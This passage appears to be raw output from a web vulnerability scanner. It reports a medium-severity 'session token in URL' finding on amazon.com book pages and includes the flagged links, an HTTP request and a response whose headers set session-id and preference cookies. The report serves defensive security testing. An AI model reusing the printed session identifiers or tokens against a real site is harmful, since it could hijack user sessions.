<a href="/gp/redirect.html/ref=cm_sw_cl_fa_dp_BJTpnb1EQ5KVK?token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1&amp;location=http%3A%2F%2Fwww.facebook.com%2Fshare.php%3Fu%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2F0313363153%2Fref%3Dcm_sw_r_fa_dp_BJTpnb1EQ5KVK%26bodytext%3DBreaking%2520Free%252C%2520Starting%2520Over%253A%2520Parenting%2520in%2520the%2520Aftermath%2520of%2520Family%2520Violence%2520by%2520Christina%2520M.%2520Dalpiaz" target="_blank" onclick="window.open('/gp/redirect.html/ref=cm_sw_cl_fa_dp_BJTpnb1EQ5KVK?token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1&location=http%3A%2F%2Fwww.facebook.com%2Fshare.php%3Fu%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2F0313363153%2Fref%3Dcm_sw_r_fa_dp_BJTpnb1EQ5KVK%26bodytext%3DBreaking%2520Free%252C%2520Starting%2520Over%253A%2520Parenting%2520in%2520the%2520Aftermath%2520of%2520Family%2520Violence%2520by%2520Christina%2520M.%2520Dalpiaz', '_blank', 'location=yes,width=700,height=400');return false;"><span class="tafSocialButton" style="background-position: 0 -1px; height: 15px; width: 15px;">
...[SNIP]...
</a><a href="/gp/redirect.html/ref=cm_sw_cl_tw_dp_BJTpnb1EQ5KVK?token=7A1A4AE8F6CE0BD277D8295E58702D283F329C0F&amp;location=http%3A%2F%2Ftwitter.com%2Fshare%3Foriginal_referer%3Dhttp%253A%252F%252Fwww.amazon.com%252Fgp%252Fproduct%252F0313363153%252Fref%253Dcm_sw_r_tw_dp_BJTpnb1EQ5KVK%26related%3Damazondeals%2Camazonmp3%26via%3Damazon%26text%3DBreaking%2520Free%252C%2520Starting%2520Over%253A%2520Parenting%2520in%2520the%2520Aftermath%2520of%2520Family%2520Violence%2520by...%26url%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2F0313363153%2Fref%3Dcm_sw_r_tw_dp_BJTpnb1EQ5KVK%26count%3Dnone" target="_blank" onclick="window.open('/gp/redirect.html/ref=cm_sw_cl_tw_dp_BJTpnb1EQ5KVK?token=7A1A4AE8F6CE0BD277D8295E58702D283F329C0F&location=http%3A%2F%2Ftwitter.com%2Fshare%3Foriginal_referer%3Dhttp%253A%252F%252Fwww.amazon.com%252Fgp%252Fproduct%252F0313363153%252Fref%253Dcm_sw_r_tw_dp_BJTpnb1EQ5KVK%26related%3Damazondeals%2Camazonmp3%26via%3Damazon%26text%3DBreaking%2520Free%252C%2520Starting%2520Over%253A%2520Parenting%2520in%2520the%2520Aftermath%2520of%2520Family%2520Violence%2520by...%26url%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2F0313363153%2Fref%3Dcm_sw_r_tw_dp_BJTpnb1EQ5KVK%26count%3Dnone', '_blank', 'location=yes,width=700,height=400');return false;"><span class="tafSocialButton" style="background-position: -15px -1px; height: 15px; width: 15px;">
...[SNIP]...
</span><a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R3ZTIIY2IL392/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=5150085B47183668122EAFCC27ECE5F23DE669B5&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDMxMzM2MzE1My9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmdGFnPXBhcmVudGhvb2Rjb20tMjAmbGlua0NvZGU9b3AxJmNhbXA9MjExNDkzJmFkaWQ9MUU0M0dHQTlYQUpLQ0FFWEFQTlomaXNTUkFkbWluPSZjcmVhdGl2ZT0zNzk5ODEmY3JlYXRpdmVBU0lOPTAzMTMzNjMxNTM&voteAnchorName=R3ZTIIY2IL392.2115.Helpful.Reviews&voteSessionID=188-3368164-3583051"><span class="cmtySprite s_largeYes " >
...[SNIP]...
</a>
<a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R3ZTIIY2IL392/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=FC82A74D1E62C7EA36EE314FA3F6368A848BDBBD&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDMxMzM2MzE1My9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmdGFnPXBhcmVudGhvb2Rjb20tMjAmbGlua0NvZGU9b3AxJmNhbXA9MjExNDkzJmFkaWQ9MUU0M0dHQTlYQUpLQ0FFWEFQTlomaXNTUkFkbWluPSZjcmVhdGl2ZT0zNzk5ODEmY3JlYXRpdmVBU0lOPTAzMTMzNjMxNTM&voteAnchorName=R3ZTIIY2IL392.2115.Helpful.Reviews&voteSessionID=188-3368164-3583051"><span class="cmtySprite s_largeNo " >
...[SNIP]...
<nobr><a rel="nofollow" class="reportingButton" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R3ZTIIY2IL392/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=5B840721150D35FE87BEE378FEECF1DC012D8847&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDMxMzM2MzE1My9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmdGFnPXBhcmVudGhvb2Rjb20tMjAmbGlua0NvZGU9b3AxJmNhbXA9MjExNDkzJmFkaWQ9MUU0M0dHQTlYQUpLQ0FFWEFQTlomaXNTUkFkbWluPSZjcmVhdGl2ZT0zNzk5ODEmY3JlYXRpdmVBU0lOPTAzMTMzNjMxNTM&voteAnchorName=R3ZTIIY2IL392.2115.Inappropriate.Reviews&voteSessionID=188-3368164-3583051"
>
Report abuse</a>
...[SNIP]...
<li><a href="/gp/redirect.html/ref=gw_m_b_ir/188-3368164-3583051?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-irhome%26c%3D97664&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8">Investor Relations</a>
...[SNIP]...
<li><a href="/gp/redirect.html/ref=gw_m_b_pr/188-3368164-3583051?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-mediaHome%26c%3D176060&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8">Press Releases</a>
...[SNIP]...
<li><a href="/gp/redirect.html/188-3368164-3583051?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fsell-on-amazon.htm%3Fld%3DAZFSSOA&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8">Sell on Amazon</a>
...[SNIP]...
<li><a href="/gp/redirect.html/188-3368164-3583051?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fproduct-ads-on-amazon.htm%3Fld%3DAZPADSFooter&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8">Advertise Your Products</a>
...[SNIP]...

9.71. http://www.amazon.com/dp/0814410960

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /dp/0814410960

Issue detail

The response contains the following links that appear to contain session tokens:
  • http://www.amazon.com/gp/redirect.html/176-7210136-6598218?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fproduct-ads-on-amazon.htm%3Fld%3DAZPADSFooter&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8
  • http://www.amazon.com/gp/redirect.html/176-7210136-6598218?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fsell-on-amazon.htm%3Fld%3DAZFSSOA&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8
  • http://www.amazon.com/gp/redirect.html/ref=cm_sw_cl_fa_dp_RITpnb019NC4P?token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1&location=http%3A%2F%2Fwww.facebook.com%2Fshare.php%3Fu%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2F0814410960%2Fref%3Dcm_sw_r_fa_dp_RITpnb019NC4P%26bodytext%3DRaising%2520Freethinkers%253A%2520A%2520Practical%2520Guide%2520for%2520Parenting%2520Beyond%2520Belief%2520by%2520Dale%2520McGowan
  • http://www.amazon.com/gp/redirect.html/ref=cm_sw_cl_tw_dp_RITpnb019NC4P?token=7A1A4AE8F6CE0BD277D8295E58702D283F329C0F&location=http%3A%2F%2Ftwitter.com%2Fshare%3Foriginal_referer%3Dhttp%253A%252F%252Fwww.amazon.com%252Fgp%252Fproduct%252F0814410960%252Fref%253Dcm_sw_r_tw_dp_RITpnb019NC4P%26related%3Damazondeals%2Camazonmp3%26via%3Damazon%26text%3DRaising%2520Freethinkers%253A%2520A%2520Practical%2520Guide%2520for%2520Parenting%2520Beyond%2520Belief%2520by%2520Dale%2520McGowan%26url%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2F0814410960%2Fref%3Dcm_sw_r_tw_dp_RITpnb019NC4P%26count%3Dnone
  • http://www.amazon.com/gp/redirect.html/ref=gw_m_b_ir/176-7210136-6598218?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-irhome%26c%3D97664&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8
  • http://www.amazon.com/gp/redirect.html/ref=gw_m_b_pr/176-7210136-6598218?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-mediaHome%26c%3D176060&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8
  • http://www.amazon.com/gp/voting/cast/Reviews/2115/R1UFO9UB2P4IAJ/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=113496E24FD421A11E316AD1E459851B2F5E7309&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDgxNDQxMDk2MC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmdGFnPXBhcmVudGhvb2Rjb20tMjAmbGlua0NvZGU9b3AxJmNhbXA9MjExNDkzJmFkaWQ9MUU0M0dHQTlYQUpLQ0FFWEFQTlomaXNTUkFkbWluPSZjcmVhdGl2ZT0zNzk5ODEmY3JlYXRpdmVBU0lOPTA4MTQ0MTA5NjA&voteAnchorName=R1UFO9UB2P4IAJ.2115.Helpful.Reviews&voteSessionID=176-7210136-6598218
  • http://www.amazon.com/gp/voting/cast/Reviews/2115/R1UFO9UB2P4IAJ/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=BAACC80F3B8910F625943593F11186D745F3C0A9&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDgxNDQxMDk2MC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmdGFnPXBhcmVudGhvb2Rjb20tMjAmbGlua0NvZGU9b3AxJmNhbXA9MjExNDkzJmFkaWQ9MUU0M0dHQTlYQUpLQ0FFWEFQTlomaXNTUkFkbWluPSZjcmVhdGl2ZT0zNzk5ODEmY3JlYXRpdmVBU0lOPTA4MTQ0MTA5NjA&voteAnchorName=R1UFO9UB2P4IAJ.2115.Helpful.Reviews&voteSessionID=176-7210136-6598218
  • http://www.amazon.com/gp/voting/cast/Reviews/2115/R1UFO9UB2P4IAJ/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=03C344605DE37626CB4960BA9773574E491143FA&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDgxNDQxMDk2MC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmdGFnPXBhcmVudGhvb2Rjb20tMjAmbGlua0NvZGU9b3AxJmNhbXA9MjExNDkzJmFkaWQ9MUU0M0dHQTlYQUpLQ0FFWEFQTlomaXNTUkFkbWluPSZjcmVhdGl2ZT0zNzk5ODEmY3JlYXRpdmVBU0lOPTA4MTQ0MTA5NjA&voteAnchorName=R1UFO9UB2P4IAJ.2115.Inappropriate.Reviews&voteSessionID=176-7210136-6598218
  • http://www.amazon.com/gp/voting/cast/Reviews/2115/RGWC90CBE1BIC/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=55639B32FEBD11A47FD73EF98DE173CFF439110D&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDgxNDQxMDk2MC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmdGFnPXBhcmVudGhvb2Rjb20tMjAmbGlua0NvZGU9b3AxJmNhbXA9MjExNDkzJmFkaWQ9MUU0M0dHQTlYQUpLQ0FFWEFQTlomaXNTUkFkbWluPSZjcmVhdGl2ZT0zNzk5ODEmY3JlYXRpdmVBU0lOPTA4MTQ0MTA5NjA&voteAnchorName=RGWC90CBE1BIC.2115.Helpful.Reviews&voteSessionID=176-7210136-6598218
  • http://www.amazon.com/gp/voting/cast/Reviews/2115/RGWC90CBE1BIC/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=DF9191EBAA35DB9C8C5C45CB19E1874118BDC838&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDgxNDQxMDk2MC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmdGFnPXBhcmVudGhvb2Rjb20tMjAmbGlua0NvZGU9b3AxJmNhbXA9MjExNDkzJmFkaWQ9MUU0M0dHQTlYQUpLQ0FFWEFQTlomaXNTUkFkbWluPSZjcmVhdGl2ZT0zNzk5ODEmY3JlYXRpdmVBU0lOPTA4MTQ0MTA5NjA&voteAnchorName=RGWC90CBE1BIC.2115.Helpful.Reviews&voteSessionID=176-7210136-6598218
  • http://www.amazon.com/gp/voting/cast/Reviews/2115/RGWC90CBE1BIC/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=AAE52732137D56F7486FA32E3865DB5CFF649D3E&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDgxNDQxMDk2MC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmdGFnPXBhcmVudGhvb2Rjb20tMjAmbGlua0NvZGU9b3AxJmNhbXA9MjExNDkzJmFkaWQ9MUU0M0dHQTlYQUpLQ0FFWEFQTlomaXNTUkFkbWluPSZjcmVhdGl2ZT0zNzk5ODEmY3JlYXRpdmVBU0lOPTA4MTQ0MTA5NjA&voteAnchorName=RGWC90CBE1BIC.2115.Inappropriate.Reviews&voteSessionID=176-7210136-6598218
  • http://www.amazon.com/gp/voting/cast/Reviews/2115/RNSAIF7Q39YFB/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=4889AC1ECD1E8DE3F6A180C1B5C8D1789FD9463E&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDgxNDQxMDk2MC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmdGFnPXBhcmVudGhvb2Rjb20tMjAmbGlua0NvZGU9b3AxJmNhbXA9MjExNDkzJmFkaWQ9MUU0M0dHQTlYQUpLQ0FFWEFQTlomaXNTUkFkbWluPSZjcmVhdGl2ZT0zNzk5ODEmY3JlYXRpdmVBU0lOPTA4MTQ0MTA5NjA&voteAnchorName=RNSAIF7Q39YFB.2115.Helpful.Reviews&voteSessionID=176-7210136-6598218
  • http://www.amazon.com/gp/voting/cast/Reviews/2115/RNSAIF7Q39YFB/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=3ED15F6A6D485DF4ADAA3D8D7958D55E1FED8EAB&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDgxNDQxMDk2MC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmdGFnPXBhcmVudGhvb2Rjb20tMjAmbGlua0NvZGU9b3AxJmNhbXA9MjExNDkzJmFkaWQ9MUU0M0dHQTlYQUpLQ0FFWEFQTlomaXNTUkFkbWluPSZjcmVhdGl2ZT0zNzk5ODEmY3JlYXRpdmVBU0lOPTA4MTQ0MTA5NjA&voteAnchorName=RNSAIF7Q39YFB.2115.Helpful.Reviews&voteSessionID=176-7210136-6598218
  • http://www.amazon.com/gp/voting/cast/Reviews/2115/RNSAIF7Q39YFB/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=7DD5CA7DBBFEDFE0C103F968D22A046D3A241B76&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDgxNDQxMDk2MC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmdGFnPXBhcmVudGhvb2Rjb20tMjAmbGlua0NvZGU9b3AxJmNhbXA9MjExNDkzJmFkaWQ9MUU0M0dHQTlYQUpLQ0FFWEFQTlomaXNTUkFkbWluPSZjcmVhdGl2ZT0zNzk5ODEmY3JlYXRpdmVBU0lOPTA4MTQ0MTA5NjA&voteAnchorName=RNSAIF7Q39YFB.2115.Inappropriate.Reviews&voteSessionID=176-7210136-6598218

Request

GET /dp/0814410960?tag=parenthoodcom-20&camp=211493&creative=379981&linkCode=op1&creativeASIN=0814410960&adid=1E43GGA9XAJKCAEXAPNZ& HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:05:30 GMT
Server: Server
x-amz-id-1: 0V1X9WNQCM47PDADFQGC
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: SKWOpw071+vUvE/zvz84QekiVG202hXgMiv2MgQFljVkajAJe9OwpyfODLjeHTmR
Vary: Accept-Encoding,User-Agent
nnCoection: close
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=176-7210136-6598218; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: UserPref=y3NkdEGeLcNmXCUiBl72zia0IgOUlzJisM6ejtj6++wAzjFW+0MbDLrBrMTYId5ScAAIGSpPr8ov4wvfMrz16qkoExEE846LElBHdCDq1wJ5G3PyH/8+t8ULEiTMRJzZ+/UmohvS0s1wbtQLhB5tRJaj+v9Qvdikv5wA8Z+9BSaQuNwa25tYVL3brZaSaxoPnkAsz7sFby/Vm3IEdAyCOCgmDlA7LSKWp7BGexnTvAm3XJETeqxNVJ4XDLyzD9mn489zuGO7Hr1Q5jDtdTkD7MsDhmN6H6NA+BAMoVhXzdj8ywD6RaU+CKSyhgSibHDJfiAf99mXgDVIui4kc0MR8MKRTBSKmuzQBaMCl0Pf98laS7P8B1wibfy99GA8Gxn4ZYxd9IYn+0IOEpAUVtWvSy3VhH2tV4F6FYuFOflVaV1k+o8nZAdjmsVsH/6mMkOtJfcsZt8CR0o=; path=/; domain=.amazon.com; expires=Tue Feb 01 14:05:31 2011 GMT
Content-Length: 398021


<html>
<head>


<style type="text/css"><!--


BODY { font-
...[SNIP]...
</a>
<a href="/gp/redirect.html/ref=cm_sw_cl_fa_dp_RITpnb019NC4P?token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1&amp;location=http%3A%2F%2Fwww.facebook.com%2Fshare.php%3Fu%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2F0814410960%2Fref%3Dcm_sw_r_fa_dp_RITpnb019NC4P%26bodytext%3DRaising%2520Freethinkers%253A%2520A%2520Practical%2520Guide%2520for%2520Parenting%2520Beyond%2520Belief%2520by%2520Dale%2520McGowan" target="_blank" onclick="window.open('/gp/redirect.html/ref=cm_sw_cl_fa_dp_RITpnb019NC4P?token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1&location=http%3A%2F%2Fwww.facebook.com%2Fshare.php%3Fu%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2F0814410960%2Fref%3Dcm_sw_r_fa_dp_RITpnb019NC4P%26bodytext%3DRaising%2520Freethinkers%253A%2520A%2520Practical%2520Guide%2520for%2520Parenting%2520Beyond%2520Belief%2520by%2520Dale%2520McGowan', '_blank', 'location=yes,width=700,height=400');return false;"><span class="tafSocialButton" style="background-position: 0 -1px; height: 15px; width: 15px;">
...[SNIP]...
</a><a href="/gp/redirect.html/ref=cm_sw_cl_tw_dp_RITpnb019NC4P?token=7A1A4AE8F6CE0BD277D8295E58702D283F329C0F&amp;location=http%3A%2F%2Ftwitter.com%2Fshare%3Foriginal_referer%3Dhttp%253A%252F%252Fwww.amazon.com%252Fgp%252Fproduct%252F0814410960%252Fref%253Dcm_sw_r_tw_dp_RITpnb019NC4P%26related%3Damazondeals%2Camazonmp3%26via%3Damazon%26text%3DRaising%2520Freethinkers%253A%2520A%2520Practical%2520Guide%2520for%2520Parenting%2520Beyond%2520Belief%2520by%2520Dale%2520McGowan%26url%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2F0814410960%2Fref%3Dcm_sw_r_tw_dp_RITpnb019NC4P%26count%3Dnone" target="_blank" onclick="window.open('/gp/redirect.html/ref=cm_sw_cl_tw_dp_RITpnb019NC4P?token=7A1A4AE8F6CE0BD277D8295E58702D283F329C0F&location=http%3A%2F%2Ftwitter.com%2Fshare%3Foriginal_referer%3Dhttp%253A%252F%252Fwww.amazon.com%252Fgp%252Fproduct%252F0814410960%252Fref%253Dcm_sw_r_tw_dp_RITpnb019NC4P%26related%3Damazondeals%2Camazonmp3%26via%3Damazon%26text%3DRaising%2520Freethinkers%253A%2520A%2520Practical%2520Guide%2520for%2520Parenting%2520Beyond%2520Belief%2520by%2520Dale%2520McGowan%26url%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2F0814410960%2Fref%3Dcm_sw_r_tw_dp_RITpnb019NC4P%26count%3Dnone', '_blank', 'location=yes,width=700,height=400');return false;"><span class="tafSocialButton" style="background-position: -15px -1px; height: 15px; width: 15px;">
...[SNIP]...
</span><a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/RGWC90CBE1BIC/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=DF9191EBAA35DB9C8C5C45CB19E1874118BDC838&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDgxNDQxMDk2MC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmdGFnPXBhcmVudGhvb2Rjb20tMjAmbGlua0NvZGU9b3AxJmNhbXA9MjExNDkzJmFkaWQ9MUU0M0dHQTlYQUpLQ0FFWEFQTlomaXNTUkFkbWluPSZjcmVhdGl2ZT0zNzk5ODEmY3JlYXRpdmVBU0lOPTA4MTQ0MTA5NjA&voteAnchorName=RGWC90CBE1BIC.2115.Helpful.Reviews&voteSessionID=176-7210136-6598218"><span class="cmtySprite s_largeYes " >
...[SNIP]...
</a>
<a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/RGWC90CBE1BIC/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=55639B32FEBD11A47FD73EF98DE173CFF439110D&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDgxNDQxMDk2MC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmdGFnPXBhcmVudGhvb2Rjb20tMjAmbGlua0NvZGU9b3AxJmNhbXA9MjExNDkzJmFkaWQ9MUU0M0dHQTlYQUpLQ0FFWEFQTlomaXNTUkFkbWluPSZjcmVhdGl2ZT0zNzk5ODEmY3JlYXRpdmVBU0lOPTA4MTQ0MTA5NjA&voteAnchorName=RGWC90CBE1BIC.2115.Helpful.Reviews&voteSessionID=176-7210136-6598218"><span class="cmtySprite s_largeNo " >
...[SNIP]...
<nobr><a rel="nofollow" class="reportingButton" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/RGWC90CBE1BIC/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=AAE52732137D56F7486FA32E3865DB5CFF649D3E&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDgxNDQxMDk2MC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmdGFnPXBhcmVudGhvb2Rjb20tMjAmbGlua0NvZGU9b3AxJmNhbXA9MjExNDkzJmFkaWQ9MUU0M0dHQTlYQUpLQ0FFWEFQTlomaXNTUkFkbWluPSZjcmVhdGl2ZT0zNzk5ODEmY3JlYXRpdmVBU0lOPTA4MTQ0MTA5NjA&voteAnchorName=RGWC90CBE1BIC.2115.Inappropriate.Reviews&voteSessionID=176-7210136-6598218"
>
Report abuse</a>
...[SNIP]...
</span><a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/RNSAIF7Q39YFB/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=3ED15F6A6D485DF4ADAA3D8D7958D55E1FED8EAB&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDgxNDQxMDk2MC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmdGFnPXBhcmVudGhvb2Rjb20tMjAmbGlua0NvZGU9b3AxJmNhbXA9MjExNDkzJmFkaWQ9MUU0M0dHQTlYQUpLQ0FFWEFQTlomaXNTUkFkbWluPSZjcmVhdGl2ZT0zNzk5ODEmY3JlYXRpdmVBU0lOPTA4MTQ0MTA5NjA&voteAnchorName=RNSAIF7Q39YFB.2115.Helpful.Reviews&voteSessionID=176-7210136-6598218"><span class="cmtySprite s_largeYes " >
...[SNIP]...
</a>
<a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/RNSAIF7Q39YFB/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=4889AC1ECD1E8DE3F6A180C1B5C8D1789FD9463E&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDgxNDQxMDk2MC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmdGFnPXBhcmVudGhvb2Rjb20tMjAmbGlua0NvZGU9b3AxJmNhbXA9MjExNDkzJmFkaWQ9MUU0M0dHQTlYQUpLQ0FFWEFQTlomaXNTUkFkbWluPSZjcmVhdGl2ZT0zNzk5ODEmY3JlYXRpdmVBU0lOPTA4MTQ0MTA5NjA&voteAnchorName=RNSAIF7Q39YFB.2115.Helpful.Reviews&voteSessionID=176-7210136-6598218"><span class="cmtySprite s_largeNo " >
...[SNIP]...
<nobr><a rel="nofollow" class="reportingButton" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/RNSAIF7Q39YFB/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=7DD5CA7DBBFEDFE0C103F968D22A046D3A241B76&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDgxNDQxMDk2MC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmdGFnPXBhcmVudGhvb2Rjb20tMjAmbGlua0NvZGU9b3AxJmNhbXA9MjExNDkzJmFkaWQ9MUU0M0dHQTlYQUpLQ0FFWEFQTlomaXNTUkFkbWluPSZjcmVhdGl2ZT0zNzk5ODEmY3JlYXRpdmVBU0lOPTA4MTQ0MTA5NjA&voteAnchorName=RNSAIF7Q39YFB.2115.Inappropriate.Reviews&voteSessionID=176-7210136-6598218"
>
Report abuse</a>
...[SNIP]...
</span><a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R1UFO9UB2P4IAJ/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=BAACC80F3B8910F625943593F11186D745F3C0A9&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDgxNDQxMDk2MC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmdGFnPXBhcmVudGhvb2Rjb20tMjAmbGlua0NvZGU9b3AxJmNhbXA9MjExNDkzJmFkaWQ9MUU0M0dHQTlYQUpLQ0FFWEFQTlomaXNTUkFkbWluPSZjcmVhdGl2ZT0zNzk5ODEmY3JlYXRpdmVBU0lOPTA4MTQ0MTA5NjA&voteAnchorName=R1UFO9UB2P4IAJ.2115.Helpful.Reviews&voteSessionID=176-7210136-6598218"><span class="cmtySprite s_largeYes " >
...[SNIP]...
</a>
